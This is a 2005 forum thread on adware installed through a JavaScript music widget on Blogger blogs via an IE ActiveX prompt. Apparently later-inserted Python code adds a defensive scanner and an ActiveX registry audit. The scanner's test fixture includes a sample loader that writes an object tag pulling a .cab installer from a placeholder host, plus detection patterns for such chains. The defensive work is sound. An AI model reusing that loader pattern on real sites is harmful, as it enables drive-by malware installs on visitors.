Spyware hitting blogs
February 21, 2005 10:15 PM

I often say that blogs are currently where the web was in 1998, with history repeating itself only this time with blogs. The latest sign: spyware and viruses are now being transmitted via blogs, specifically, random blogs on blogspot.com, found via the "Next Blog" button. Remember, just because a delightful purple gorilla wants to read blog entries to you doesn't mean you should click on him.
posted by mathowie (29 comments total)

It's still ok to input my credit number in the banner ad so that they can check and make sure it's not stolen right?
posted by riffola at 10:31 PM on February 21, 2005


So how is this nana294 installing spyware exactly? Which platforms/browsers? ActiveX exploit, javascript, some type of overflow exploit? Should I stop clicking links?
posted by bobo123 at 10:43 PM on February 21, 2005


I suspect the exploits are all IE/windows only.
posted by mathowie at 10:54 PM on February 21, 2005


I'm curious about that, too, bobo123. Me, I use either Safari on OS X or Konqueror on Linux. Neither of which makes me "safe," but I am curious what the infection vector would be. I strongly suspect ActiveX and IE on Windows, but what do I know (not much)?

It's a bummer though -- I like the "Next Blog" button. If for nothing else, you can see just how bad some people's design sense is.
posted by teece at 10:58 PM on February 21, 2005


Although, opendiary.com is a good source also. EliteBar is a pain to clean.

I am so glad I self-host.
posted by Samizdata at 11:02 PM on February 21, 2005


Okay, I bit and visited. The culprit weblog looks pretty normal to me (Moz 1.7). Badly written, overdone design, the usual fare. A quick skim through the code didn't reveal anything extraordinarily suspicious. Strange.
posted by DrJohnEvans at 11:08 PM on February 21, 2005


Note: I use Mozilla variants via either Linux or Win98, so my spyware defence is based on a strategy of being in the obscure minority.
posted by DrJohnEvans at 11:09 PM on February 21, 2005


Oh, scumbags, is there any part of the Internet you won't ruin? First it was e-mail... Then it was Usenet... Then it was web ads & cookies... And IMs...

Ah well, there's always Bittorrent.
posted by keswick at 11:28 PM on February 21, 2005


This is ridiculous. First off, the author won't even mention the site in question so I can't test it and he keeps using terms like "my browser" instead of IE or Mozilla. Someone should tell this guy that there's no such thing as security through obscurity and he should try writing some damn details as this just feeds into "the web is unsafe" nonsense. IE may be unsafe, but I would be very surprised to see a cross-browser exploit which installed spyware. Not to mention, someone this technically clueless may just not understand the fact that he may have been infected previously. Who knows.

Details, people. They're good for you.
posted by skallas at 11:40 PM on February 21, 2005


Thanks for giving those "scumbags" new ideas, keswick. And for Christ's sake, don't mention Meta----- ######## NO CARRIER
posted by DaShiv at 11:41 PM on February 21, 2005


skallas, the site in question is mentioned in the "now being transmitted" link, in the email copy. It's quoted by the Blogger people in their reply: nana294.blogspot.com.
posted by DrJohnEvans at 11:44 PM on February 21, 2005


Er, I don't see a "next blog" button in the top right corner...

(Linux/Firefox)
posted by salmacis at 12:05 AM on February 22, 2005


salmacis, the MT Law blog moved to their own domain and turned off the Blogger bar. You can still see it at their old domain, complete with zealous warning message.
posted by DrJohnEvans at 12:11 AM on February 22, 2005


BTW - I went to the nana294 blog and I got a Javascript popup saying "Sorry, you are not using a WIN32 computer".
posted by salmacis at 12:12 AM on February 22, 2005


in firefox i see an "additional plugins are required to display all the media on this page" thingy.
likely it's IE only.
posted by juv3nal at 12:12 AM on February 22, 2005


I think I see what it is doing -- in a very general sense. I am neither a Windows Guru nor has my clean programming mind been sullied with the vagaries of Javascript. But the page gets a remote jscript that is ostensibly to play music (iWebTunes), but it also downloads another jscript which gets a file called v3cab.cab from searchmiracle.com/cab. I don't know from a cursory glance how that little file does anything to your machine, but I would guess that is the entry point. It is certainly Windows specific -- they are even kind enough to tell you in the jscript and in a browser pop-up.

Scum-bags. But it also makes me wonder: some people might just see a bit of javascript to play music on their blog, and think, yippee!, and install the code, and then infect people unknowingly. But then again, who can install a bit of Javascript on their web page and not understand such simple things?

Gee, I hope it can't infect wget on my mac ... :-)
posted by teece at 12:17 AM on February 22, 2005


Hey, I opened about eight "next blogs" in new tabs, and one of 'em did manage to sneak a pop-up window through.

Nice bit of work, teece. I imagine that if it was voluntarily installed (and I maintain that that particular blog looks too involved to be only a spyware front), then the installation instructions just called for a strategic copy-and-paste.

Okay, enough playing for tonight. I'm going to bed.
posted by DrJohnEvans at 12:20 AM on February 22, 2005


I bet you're right, DrJohnEvans -- it is only 4 lines of JavaScript that appears to be getting the trojan. I wouldn't be at all surprised if the owner of that Blogger page simply Copy-n-Pasted that code into his/her blog, wanting it to play a tune. It does appear to actually play music (or at least try to), but I don't have a Windows IE platform to test it -- and if I did I wouldn't.

Sigh. Must everything turn into a sewer?
posted by teece at 12:31 AM on February 22, 2005
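The chain teece traces in the two posts above (a remote "music" script that pulls a second script, which in turn fetches a .cab installer and shows a WIN32 nag) is the kind of thing you can triage statically once you have the page and its scripts on disk. The following is an added example written for this thread, not code from the blog or from anyone in the discussion: it walks the script chain offline from a `{url: body}` map and reports off-site script loads, chained loads, .cab download URLs, `document.write`-injected `<object>` tags, and browser-upgrade nag text. All hostnames, script bodies and the CLSID are constructed placeholders.

```python
"""Static triage of a blog page and the scripts it pulls in, looking for the
drive-by ActiveX installer chain described in the thread: an off-site 'music'
script that loads a second script, which writes an <object> tag whose codebase
is a .cab file, plus 'WIN32' / 'upgrade your browser' nag text.
All page and script bodies here are constructed samples with placeholder
hostnames; none of it is captured from the real blog."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _TagCollector(HTMLParser):
    """Collects <script src> values and <object> attributes from HTML."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.objects = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "object":
            self.objects.append(a)


CAB_RE = re.compile(r"(https?://[^\"'\s>]+\.cab)", re.I)
CHAIN_RE = re.compile(r"src\s*=\s*[\"']?(https?://[^\"'\s>]+\.js)", re.I)
WRITE_OBJECT_RE = re.compile(r"document\.write\s*\(.*<object", re.I | re.S)
NAG_RE = re.compile(r"out of date browser|upgrade your browser|win32", re.I)


def triage(page_url, resources, max_depth=5):
    """resources maps URL -> body (what a fetch would have returned), so the
    analysis runs offline. Returns a list of (severity, location, finding)."""
    findings = []
    page_host = urlparse(page_url).netloc
    seen = set()

    def scan_script(url, depth):
        if url in seen or depth > max_depth:
            return
        seen.add(url)
        body = resources.get(url)
        if body is None:
            findings.append(("warn", url, "script referenced but not fetched"))
            return
        for m in CAB_RE.finditer(body):
            findings.append(("high", url, f"CAB download URL in script: {m.group(1)}"))
        if WRITE_OBJECT_RE.search(body):
            findings.append(("high", url, "script document.write()s an <object> tag"))
        if NAG_RE.search(body):
            findings.append(("warn", url, "browser-upgrade / WIN32 nag text in script"))
        for m in CHAIN_RE.finditer(body):  # scripts that load further scripts
            findings.append(("info", url, f"chained script load: {m.group(1)}"))
            scan_script(m.group(1), depth + 1)

    collector = _TagCollector()
    collector.feed(resources[page_url])
    for src in collector.scripts:
        full = urljoin(page_url, src)
        if urlparse(full).netloc != page_host:
            findings.append(("info", page_url, f"off-site script: {full}"))
        scan_script(full, 1)
    for attrs in collector.objects:
        codebase = attrs.get("codebase", "")
        if codebase.split("#")[0].lower().endswith(".cab"):
            findings.append(("high", page_url,
                             f"<object> installs CAB from {urljoin(page_url, codebase)}"))
    return findings


SEVERITY_RANK = {"info": 1, "warn": 2, "high": 3}


def highest_severity(findings):
    return max((sev for sev, _, _ in findings), key=SEVERITY_RANK.get, default=None)


# Constructed sample: a blog page, its own menu script, a third-party "music"
# widget and the loader it chains to (placeholder hostnames and CLSID).
PAGE = "http://victimblog.example/"
SAMPLE_RESOURCES = {
    PAGE: """<html><body>
<script src="/js/menu.js"></script>
<script src="http://music-widget.example/player.js"></script>
<p>my blog</p></body></html>""",
    "http://victimblog.example/js/menu.js":
        "function toggle(id){var e=document.getElementById(id);e.hidden=!e.hidden;}",
    "http://music-widget.example/player.js":
        "document.write('<script src=\"http://music-widget.example/loader.js\"></scr' + 'ipt>');",
    "http://music-widget.example/loader.js": (
        "if (navigator.platform.indexOf('Win32') < 0) {"
        " alert('Sorry, you are not using a WIN32 computer'); } else {"
        " document.write('<object classid=\"clsid:00000000-0000-0000-0000-000000000000\""
        " codebase=\"http://adware.example/cab/toolbar.cab#version=1,0,0,0\"></object>'); }"
    ),
}


def demo():
    return triage(PAGE, SAMPLE_RESOURCES)


if __name__ == "__main__":
    for sev, where, what in demo():
        print(f"[{sev:4}] {where}: {what}")
    print("overall:", highest_severity(demo()))
```

The same-site `menu.js` produces no findings, which is the point of resolving each `src` against the page host: a blog's own scripts are noise, the third-party widget is where the review effort goes. Feeding it real captures means fetching each script body yourself (with a non-IE client or a plain downloader) and placing it in the map under its absolute URL.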


>quoted by the Blogger people in their reply: nana294.blogspot.com.

Thanks doc.

Okay, I tested this on a winxp box with the following browsers:

Firefox: No effect. Not even the javascript pop-up boxes.

IESP2: I get two javascript pop-up boxes asking me to "upgrade my browser." The ActiveX handler showed me that software signed by "Enternet Media Inc" was asking to be installed.

Summary:

There is no exploit here. This is ActiveX. ActiveX is Microsoft's web installer. If you click Yes then you are installing software, software which may be spyware. If you click no, you are not. It's that simple. The javascript pop-ups are misleading, but are not an exploit at all. Just a nag box to install this ActiveX control.

Suggestions:

Windows 2000 and XP SP1 users should double check their ActiveX settings. ActiveX download should never be set to "Enable." It should be set to either "Prompt" or "Disable." Users in general should avoid all ActiveX as it is a well known vector for spyware, with the exception of WindowsUpdate. XP SP1 users should move to SP2 as soon as possible as it doesn't allow "drive by" ActiveX installs. Ideally, users should try a non-Microsoft browser if they want to avoid this and other security problems.
posted by skallas at 2:34 AM on February 22, 2005


For anyone still worried, search miracle elitebar is IE on native systems only. Now you know how to avoid it. ;)
posted by dabitch at 3:10 AM on February 22, 2005


So how long before an XPI equivalent is in the wild for Firefox users?
posted by salmacis at 3:13 AM on February 22, 2005


There is no exploit here. But:

- EliteBar uses massively misleading software descriptions. The one I got was:

"YOU have an OUT OF DATE browser which can cause you to get infected with viruses, spam and spyware. To prevent this press YES now."

- EliteBar has installed through IE exploits before (typically MS JVM exploits).

What *could* cause this software to install automatically would be a Trusted Publishers or Trusted Zone hack. Many of the recent very commonplace IE exploits categorised at "CoolWebSearch" add software providers including Enternet Media (EliteBar) to trusted lists, causing their software to get installed instantly without prompting. Typically they later open a web page from that publisher with their own affiliate code in. Anyway, if there was a previous infection, that would cause EliteBar to install without prompting again in the future.

Problems like these are all over the web now, including 'mainstream' sites. "Don't visit untrustworthy sites or porn" just doesn't cut it any more. Turn up all your security settings or don't use IE.
posted by BobInce at 3:30 AM on February 22, 2005
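skallas's suggestion to double-check the ActiveX download settings and BobInce's point about publishers being slipped into the Trusted zone both come down to a handful of per-zone registry values. The following is an added example for this thread, not something posted by either of them: it audits one zone's ActiveX action values against the "never Enable" rule and lists Trusted-sites entries that are not on your own allow-list. The registry paths and URL-action ids (1001, 1004, 1200, 1201, with 0/1/3 for Enable/Prompt/Disable) are given from memory for IE6-era Windows and are an assumption to verify on your build; the sample values are constructed, and the live registry readers simply return nothing on non-Windows systems.

```python
"""Audit Internet Explorer's ActiveX zone settings and Trusted-sites list:
ActiveX download must never be 'Enable', and nothing unexpected should sit
in the Trusted zone, since adware that gets its publisher added there stops
prompting on later installs. Added example, not from the thread. Registry
paths and action ids are assumed (IE6-era) and should be verified; the sample
values are constructed."""
try:
    import winreg  # Windows only; absent on other platforms
except ImportError:
    winreg = None

ZONES_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
DOMAINS_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains"
ZONE_NAMES = {1: "Local intranet", 2: "Trusted sites", 3: "Internet", 4: "Restricted sites"}
ACTIVEX_ACTIONS = {  # DWORD value names under each zone key (assumed ids)
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
}
ENABLE, PROMPT, DISABLE = 0, 1, 3
LABEL = {ENABLE: "Enable", PROMPT: "Prompt", DISABLE: "Disable"}


def audit_zone(settings):
    """settings maps action id -> DWORD value for one zone.
    Returns {action description: (verdict, current setting label)}."""
    report = {}
    for action, desc in ACTIVEX_ACTIONS.items():
        val = settings.get(action)
        if val is None:
            report[desc] = ("WARN", "unset (IE default applies)")
            continue
        label = LABEL.get(val, f"unknown({val})")
        if val == ENABLE:
            # silent download / unsafe scripting is the drive-by install path;
            # merely running already-installed controls is a weaker finding
            verdict = "WARN" if action == "1200" else "FAIL"
        elif val == PROMPT and action in ("1004", "1201"):
            verdict = "WARN"  # unsigned / unsafe: a prompt is not enough, disable it
        else:
            verdict = "OK"
        report[desc] = (verdict, label)
    return report


def unexpected_trusted_sites(domain_map, expected):
    """domain_map: {domain: zone id}. Returns Trusted-zone (2) entries that are
    not on the allow-list, i.e. something added its own publisher."""
    return sorted(d for d, z in domain_map.items() if z == 2 and d not in expected)


def read_zone(zone_id):
    """Live read of one zone's ActiveX actions on Windows; {} elsewhere."""
    if winreg is None:
        return {}
    out = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, ZONES_KEY + "\\" + str(zone_id)) as k:
        for action in ACTIVEX_ACTIONS:
            try:
                out[action] = winreg.QueryValueEx(k, action)[0]
            except FileNotFoundError:
                pass
    return out


def read_domain_map():
    """Live read of ZoneMap\\Domains (top-level domain keys only); {} elsewhere."""
    if winreg is None:
        return {}
    out = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, DOMAINS_KEY) as k:
        i = 0
        while True:
            try:
                name = winreg.EnumKey(k, i)
            except OSError:
                break
            i += 1
            with winreg.OpenKey(k, name) as d:
                for scheme in ("*", "http", "https"):
                    try:
                        out[name] = winreg.QueryValueEx(d, scheme)[0]
                    except FileNotFoundError:
                        pass
    return out


# Constructed sample data standing in for a registry read.
SAMPLE_INTERNET_ZONE = {"1001": ENABLE, "1004": PROMPT, "1200": ENABLE, "1201": DISABLE}
SAMPLE_DOMAINS = {"windowsupdate.microsoft.com": 2, "adware-publisher.example": 2,
                  "intranet.corp.example": 1}
EXPECTED_TRUSTED = {"windowsupdate.microsoft.com"}


if __name__ == "__main__":
    zone = read_zone(3) or SAMPLE_INTERNET_ZONE
    for desc, (verdict, label) in audit_zone(zone).items():
        print(f"{verdict:4} {ZONE_NAMES[3]}: {desc} = {label}")
    domains = read_domain_map() or SAMPLE_DOMAINS
    print("unexpected trusted sites:", unexpected_trusted_sites(domains, EXPECTED_TRUSTED))
```

Two things worth knowing when running this for real: the same values exist under HKEY_LOCAL_MACHINE and take precedence when the "use HKLM zone settings" policy is on, and ZoneMap\Domains nests host subkeys under each domain key, which this reader skips.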


> Problems like these are all over the web now, including 'mainstream' sites. "Don't visit untrustworthy sites or porn" just doesn't cut it any more. Turn up all your security settings or don't use IE.

I've seen a couple of threads about popups hitting firefox on slashdot. They get around the blocker via flash or by dynamically linking to javascripts.

Serious exploits are only a matter of time and popularity.
posted by srboisvert at 3:38 AM on February 22, 2005


What I've learned from this post is that the search bar and next blog thing on top of Blogger blogs is no longer voluntary. If you have a Blogger blog, you have the search bar on your blogs. Unless I just missed the switch off for it.

And a quick check shows that almost 70% of my site's visitors are still using IE, which is just sad.
posted by fenriq at 8:33 AM on February 22, 2005


Crap. I reported this trick to the Blogger management six months ago -- same sort of thing, installed SearchMiracle on Windows IE (hit a machine where I work, even with AdAware current and running). It infected immediately if you clicked 'next blog' and landed on the infected page. I thought they'd rooted it out. They certainly have been aware it's possible for a long time.

It was then a chunk of code that supposedly played music, that the naive weblog page owner had copied and pasted in -- and it installed a really nasty piece of adware that came in two pieces, each of which could recreate the other if you tried manually deleting it. I've fortunately forgotten the details but a search at AdAware for "blogger" ought to turn up the gory story.
posted by hank at 8:48 AM on February 22, 2005


That bites, and I'm glad it hasn't happened to me; this news is ruining my evening. I love the next blog button, I've spent many useless wasted hours just clicking along through it all.
posted by mygothlaundry at 6:17 PM on February 22, 2005


mygothlaundry, just don't use IE and you will be fine -- the exploit relies upon ActiveX (and your clicking 'yes' to a "browser upgrade.") If you aren't using Windows, then this is not a problem at all.

Hank -- you just described exactly what the Javascripts I looked at do, on the Blogger web page I saw. So apparently Blogger has had no luck figuring out what to do about it.
posted by teece at 6:38 PM on February 22, 2005


Yeah, this is not an exploit of the "next blog" button. This could be an unsuspected part of any personal website.

Heck, you could be visiting your little sister's Geocities website, and if she had decided that she wanted background music from iWebTunes, you'd be attacked. It's an IE vulnerability, not a Blogger one.
posted by DrJohnEvans at 8:16 PM on February 22, 2005


I couldn't find her email, so I left her a message on her Doodle Board.

I feel like I just turned on a hair dryer and pointed it at the rain.
posted by DrJohnEvans at 8:21 PM on February 22, 2005



